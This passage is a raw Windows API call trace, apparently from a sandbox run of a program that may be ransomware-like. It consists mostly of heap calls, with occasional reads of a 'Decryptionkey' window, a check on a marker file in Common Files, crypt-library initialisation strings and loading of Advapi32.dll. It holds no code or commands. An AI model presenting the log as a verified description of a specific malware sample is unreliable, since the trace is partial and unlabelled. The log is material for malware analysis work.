hHeap=0xbc0000) returned 1 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xe32a98 [0260.185] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda470 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a88 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a68 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xe23818 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb58 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a58 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49db8 [0260.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb58 | out: hHeap=0xbc0000) returned 1 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb58 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x80) returned 0xc27128 [0260.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe49db8 | out: hHeap=0xbc0000) returned 1 [0260.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb58 | out: hHeap=0xbc0000) returned 1 [0260.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe23818 | out: hHeap=0xbc0000) returned 1 [0260.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a68 | out: hHeap=0xbc0000) returned 1 [0260.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a88 | out: hHeap=0xbc0000) returned 1 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xe32a88 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb58 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a68 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd98 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda410 [0260.186] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a48 [0260.186] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a48 | out: hHeap=0xbc0000) returned 1 [0260.187] SendMessageW (hWnd=0x4015e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xd [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1c) returned 0xe201f8 [0260.187] GetWindowTextW (in: hWnd=0x4015e, lpString=0xe201f8, nMaxCount=14 | out: lpString="Decryptionkey") returned 13 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda4a0 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20248 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a48 [0260.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe201f8 | out: hHeap=0xbc0000) returned 1 [0260.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda410 | out: hHeap=0xbc0000) returned 1 [0260.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fd98 | out: hHeap=0xbc0000) returned 1 [0260.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a68 | out: hHeap=0xbc0000) returned 1 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xe32a68 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda410 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a38 [0260.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a38 | out: hHeap=0xbc0000) returned 1 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xddc918 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd98 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca20 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a38 [0260.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca20 | out: hHeap=0xbc0000) returned 1 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe201f8 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca20 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcaf8 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20270 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda380 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a28 [0260.187] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda380 | out: hHeap=0xbc0000) returned 1 [0260.187] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49db8 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda380 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda3b0 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20298 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcac8 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a18 [0260.188] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcac8 | out: hHeap=0xbc0000) returned 1 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe202c0 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcac8 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc7f8 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe202e8 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda2c0 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a08 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca50 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde5810 [0260.188] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20310 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc708 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe329f8 [0260.188] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc708 | out: hHeap=0xbc0000) returned 1 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20338 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc708 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca08 [0260.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe329e8 [0260.188] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca08 | out: hHeap=0xbc0000) returned 1 [0260.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe329e8 | out: hHeap=0xbc0000) returned 1 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20360 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca08 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe329e8 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc828 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb10 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe329d8 [0260.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb10 | out: hHeap=0xbc0000) returned 1 [0260.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe329d8 | out: hHeap=0xbc0000) returned 1 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20388 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb10 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe329d8 [0260.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb10 | out: hHeap=0xbc0000) returned 1 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe203b0 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb10 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc840 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe329c8 [0260.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc840 | out: hHeap=0xbc0000) returned 1 [0260.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe329c8 | out: hHeap=0xbc0000) returned 1 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe203d8 [0260.189] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc840 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe329c8 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda5f0 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda4d0 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe329b8 [0260.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda4d0 | out: hHeap=0xbc0000) returned 1 [0260.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe329b8 | out: hHeap=0xbc0000) returned 1 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20400 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda4d0 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe329b8 [0260.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda4d0 | out: hHeap=0xbc0000) returned 1 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20428 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda4d0 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc9f0 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe329a8 [0260.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc9f0 | out: hHeap=0xbc0000) returned 1 [0260.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe329a8 | out: hHeap=0xbc0000) returned 1 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20450 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc9f0 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe329a8 [0260.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc9f0 | out: hHeap=0xbc0000) returned 1 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20478 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc9f0 [0260.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc930 [0260.191] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32998 [0260.191] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc930 | out: hHeap=0xbc0000) returned 1 [0260.191] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe204a0 [0260.191] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc930 [0260.191] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32988 [0260.191] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc870 [0260.191] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32988 | out: hHeap=0xbc0000) returned 1 [0260.191] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x7df5a8 | out: lpFindFileData=0x7df5a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33446080, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x33446080, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x3346c1e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0xd, dwReserved1=0xbc75d8, cFileName="26207383702620738370", cAlternateFileName="262073~1")) returned 0xe56a60 [0260.191] FindClose (in: hFindFile=0xe56a60 | out: hFindFile=0xe56a60) returned 1 [0260.191] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc870 | out: hHeap=0xbc0000) returned 1 [0260.191] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc930 | out: hHeap=0xbc0000) returned 1 [0260.191] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe204a0 | out: hHeap=0xbc0000) returned 1 [0260.191] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32998 | out: hHeap=0xbc0000) returned 1 [0260.191] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe204a0 [0260.192] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc930 [0260.192] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32998 [0260.192] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc870 [0260.192] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda320 [0260.192] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32988 [0260.192] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda320 | out: hHeap=0xbc0000) returned 1 [0260.192] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32988 | out: hHeap=0xbc0000) returned 1 [0260.192] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe204c8 [0260.192] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda320 [0260.192] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32988 [0260.192] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda500 [0260.192] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda440 [0260.192] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32978 [0260.193] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda440 | out: hHeap=0xbc0000) returned 1 [0260.193] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32978 | out: hHeap=0xbc0000) returned 1 [0260.194] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32978 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe204f0 [0260.194] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0260.194] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe204f0 | out: hHeap=0xbc0000) returned 1 [0260.194] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32978 | out: hHeap=0xbc0000) returned 1 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdda440 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde5858 [0260.194] PeekMessageW (in: lpMsg=0x7df904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df904) returned 0 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32978 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32968 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe32cd8 [0260.194] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0260.194] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32cd8 | out: hHeap=0xbc0000) returned 1 [0260.194] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32968 | out: hHeap=0xbc0000) returned 1 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xddc780 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde58a0 [0260.194] PeekMessageW (in: lpMsg=0x7df4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df4e4) returned 0 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32968 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32958 [0260.194] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32958 | out: hHeap=0xbc0000) returned 1 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda230 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc738 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc750 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32958 [0260.194] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda200 [0260.195] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32968 | out: hHeap=0xbc0000) returned 1 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1a0 [0260.195] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda200 | out: hHeap=0xbc0000) returned 1 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda200 [0260.195] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1a0 | out: hHeap=0xbc0000) returned 1 [0260.195] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde58a0 | out: hHeap=0xbc0000) returned 1 [0260.195] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc780 | out: hHeap=0xbc0000) returned 1 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32968 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xe23818 [0260.195] GetLastError () returned 0x0 [0260.195] SetLastError (dwErrCode=0x0) [0260.195] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda200 | out: hHeap=0xbc0000) returned 1 [0260.195] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe23818 | out: hHeap=0xbc0000) returned 1 [0260.195] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32968 | out: hHeap=0xbc0000) returned 1 [0260.195] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32978 | out: hHeap=0xbc0000) returned 1 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a60 [0260.195] PeekMessageW (in: lpMsg=0x7df904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df904) returned 0 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe204f0 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda200 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32978 [0260.195] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda200 | out: hHeap=0xbc0000) returned 1 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20518 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda200 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc780 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32968 [0260.195] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc780 | out: hHeap=0xbc0000) returned 1 [0260.195] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20540 [0260.196] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc780 [0260.196] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32948 [0260.196] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1a0 [0260.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32948 | out: hHeap=0xbc0000) returned 1 [0260.196] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0260.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20568 [0260.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32948 [0260.198] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1a0 | out: hHeap=0xbc0000) returned 1 [0260.198] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc780 | out: hHeap=0xbc0000) returned 1 [0260.198] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe20540 | out: hHeap=0xbc0000) returned 1 [0260.198] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32968 | out: hHeap=0xbc0000) returned 1 [0260.198] PeekMessageW (in: lpMsg=0x7df904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df904) returned 0 [0260.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32968 [0260.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32938 [0260.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32928 [0260.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xe23818 [0260.198] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32928 | out: hHeap=0xbc0000) returned 1 [0260.198] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe23818 | out: hHeap=0xbc0000) returned 1 [0260.198] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32938 | out: hHeap=0xbc0000) returned 1 [0260.198] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32968 | out: hHeap=0xbc0000) returned 1 [0260.198] PeekMessageW (in: lpMsg=0x7df904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df904) returned 0 [0260.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32968 [0260.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe32cd8 [0260.199] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0260.199] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32cd8 | out: hHeap=0xbc0000) returned 1 [0260.199] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32968 | out: hHeap=0xbc0000) returned 1 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20540 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xe32968 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20590 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc780 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32938 [0260.199] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32938 | out: hHeap=0xbc0000) returned 1 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdda1a0 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe205b8 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc6a8 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32938 [0260.199] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc6a8 | out: hHeap=0xbc0000) returned 1 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe205e0 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc6a8 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde58a0 [0260.199] PeekMessageW (in: lpMsg=0x7df6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df6ac) returned 0 [0260.199] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32928 [0260.199] HeapFree (in: 